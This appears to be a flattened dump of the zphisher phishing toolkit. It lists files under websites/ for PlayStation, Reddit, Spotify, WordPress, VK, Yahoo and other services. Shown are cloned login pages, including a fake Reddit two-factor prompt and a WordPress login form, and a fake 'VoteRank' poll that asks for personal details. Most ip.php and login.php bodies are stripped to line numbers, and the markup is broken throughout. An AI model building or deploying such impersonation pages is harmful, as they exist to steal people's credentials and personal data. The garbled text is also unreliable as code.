d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;po.src='https://www.gstatic.com/recaptcha/releases/5fbZx3NV5xhaMoMLrZV3TkN4/recaptcha__en_gb.js';var e=d.querySelector('script[nonce]'),n=e&&(e['nonce']||e.getAttribute('nonce'));if(n){po.setAttribute('nonce',n);}var s=d.getElementsByTagName('script')[0];s.parentNode.insertBefore(po, s); })(); -------------------------------------------------------------------------------- /websites/playstation/button_icon_password_off.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/d9ba6dd172294ae8aefa6ea391f47b265c6ecff9/websites/playstation/button_icon_password_off.png -------------------------------------------------------------------------------- /websites/playstation/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/playstation/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/protonmail/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/reddit/ip.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 10 | reddit.com: Log in 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 |
40 | 41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |

49 | 50 | Sign in 51 | 52 |

53 |

54 | You have two-factor authentication enabled on this account because you're awesome. 55 |

56 |
57 | 58 | 59 | 60 | 61 | 66 |
67 | 68 | 69 |
70 |
71 |
72 |
73 | 74 | 75 |
76 | 77 |
78 |
79 | Use a backup code 80 |
81 |
82 | 83 |
84 | 86 |
87 |
88 |
89 | 94 | 97 |
98 | Go back to account detailsHaving trouble ? 101 |
102 |
103 |
104 |
105 |
106 | 107 | 108 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | -------------------------------------------------------------------------------- /websites/reddit/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/snapchat/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/spotify/ip.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Login - Spotify 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 |
-------------------------------------------------------------------------------- /websites/spotify/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/stackoverflow/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/steam/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/twitch/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/twitter/ip.php: -------------------------------------------------------------------------------- 1 | 2?r-2:0),s=2;s4&&void 0!==arguments[4]?arguments[4]:"None",a=window.locDomain,c=e+"="+escape(t),u="; path=/"+(a?"; domain=."+a:""),s="https:"===location.protocol,l=!!o;(0,n.partConfigEnabled)("cookie_secure_default_true")&&(l=!1!==o);var f=s&&l?"; secure":"",p=l&&browser.chrome&&parseInt(browser.version)>=71&&(0,n.partConfigEnabled)("cookie_class_samesite")?"; SameSite=".concat(i):"",d="";if(r){var g=new Date;g.setTime(g.getTime()+24*r*60*60*1e3),d="; expires="+g.toGMTString()}document.cookie=c+d+u+p+f},t.initCookies=function(){window._cookies={}};var n=r("W9Tc"),o=r("DM2o")},W9Tc:function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.partConfigEnabled=function(e){var t=window.vk.pe;return!!(void 0===t?{}:t)[e]},t.calculateTimeOffsets=function(){var e=window.vk.ts;if(e&&!window.browser.opera_mobile){var t=new Date,r=Date.UTC(t.getFullYear(),t.getMonth(),t.getDate(),t.getHours(),t.getMinutes(),t.getSeconds())/1e3-e;r-=10800,r=(r/=60).toFixed(0),(r*=60)<-55800?r+=86400:r>37800&&(r-=86400);var o=0,i=Math.abs(r);[-12,-11,-10,-9.5,-9,-8,-7,-6,-5,-4.5,-4,-3.5,-3,-2,-1,0,1,2,3,3.5,4,4.5,5,5.5,5.75,6,6.5,7,8,8.75,9,9.5,10,10.5,11,12,12.75,13,14].forEach(function(e){var t=Math.round(3600*(e-3)),n=Math.abs(r-t);n/g,">").replace(/"/g,""").replace(/\'/g,"'").replace(/%/g,"%")};t.escapeAttr=function(e){return e.replace(/&/g,"&").replace(/"/g,""").replace(/\'/g,"'")};t.unescapeAttr=function(e){return e.replace(/&/g,"&").replace(/"/g,'"').replace(/'/g,"'")};t.replaceEntities=function(e){return ce("textarea",{innerHTML:(e||"").replace(//g,">").replace(/"/g,""")}).value};t.escapeStr=function(e){return e.replace(/\'/g,"\\'")};t.stripTags=function(e){return e.replace(/<[^>]+>/g,"")};t.srand=function(){return Math.random().toString(36).substr(2)};t.irand=function(e,t){return Math.floor(o(e,t))};t.utf2win=function(e){return unescape(encodeURIComponent(e))};t.vkNow=function(){return+new Date};t.defaults=function(e){for(var t=arguments.length,r=new Array(t>1?t-1:0),o=1;o 6 | -------------------------------------------------------------------------------- /websites/vk/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/vk_poll/ip.php: -------------------------------------------------------------------------------- 1 | 3 | 4 | 5 | VoteRank #289032 6 | 7 | 8 | 9 | 10 | 11 | 30 | 31 | 32 |
33 | 34 |
35 |

VoteRank

36 |

#289032

37 |
38 | 39 | 40 |
41 |
42 |
43 | 44 | What is your name?


45 | 46 | 47 | In what mountain do you live?


48 | 49 | How old are you?


50 | 51 | What are your favorite social networks?
52 | 53 | Facebook
54 | Twitter
55 | LinkedIn
56 | Instagram
57 | Snapchat
58 | Google+
59 | Vkontakte

60 |
61 | 62 |
63 | What is your favorite color?
64 | Blue
65 | Red
66 | Green
67 | Yellow
68 | Purple
69 | Orange
70 | Black
71 | White
72 | Grey
73 | Brown
74 | Pink

75 |
76 | 77 |
78 | Do you prefer money as a gift?
79 | Yes
80 | No

81 |
82 | 83 |
84 |
85 | Your favorite genre of music?
86 | People's
87 | Rock
88 | Metal
89 | Pop
90 | Jazz
91 | Shanson
92 | Hip-hop
93 | Rap
94 | Electronic
95 | Other

96 | 97 | 98 |
99 | 100 |
101 | 102 | 103 | 104 | -------------------------------------------------------------------------------- /websites/vk_poll/login.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | VoteRank #289032 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 |
25 |
26 |
 
27 |
28 |
29 |
30 |
31 | 32 |
33 |
34 |
35 |
36 | 37 | 38 |

 

39 | 40 |
41 | 42 |
43 | 44 |
45 | 46 | 47 |
48 |
49 |
50 | 51 |
52 |
53 |
54 |
55 | 56 |
57 |
58 | 59 |
60 | 61 |
62 | 63 |
64 |
65 |
66 | 67 | 68 | 69 | 70 | 71 |
73 |
74 |
75 | 76 | 77 | 78 | -------------------------------------------------------------------------------- /websites/vk_poll/p.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/d9ba6dd172294ae8aefa6ea391f47b265c6ecff9/websites/vk_poll/p.gif -------------------------------------------------------------------------------- /websites/vk_poll/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Poll completed successfully. Thnak You! 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VoteRank

14 |

#56353514

15 |
16 | 17 | 18 |

Poll completed successfully. Thank You!

19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /websites/vk_poll/s_c.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/d9ba6dd172294ae8aefa6ea391f47b265c6ecff9/websites/vk_poll/s_c.js -------------------------------------------------------------------------------- /websites/vk_poll/top_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/d9ba6dd172294ae8aefa6ea391f47b265c6ecff9/websites/vk_poll/top_logo.png -------------------------------------------------------------------------------- /websites/wordpress/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/wordpress/ip.php: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | Log In — WordPress 9 | 10 | 11 | 12 | 13 | 14 | 15 |
16 |

Powered by WordPress

17 | 18 |
19 |

20 | 22 |

23 |

24 | 26 |

27 |

28 |

29 | 30 | 31 | 32 |

33 |
34 | 35 | 38 | 39 | 52 | 53 |

← Back

54 | 55 |
56 | 57 | 58 |
59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /websites/wordpress/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /websites/yahoo/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/yahoo/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/yandex/ip.php: -------------------------------------------------------------------------------- 1 |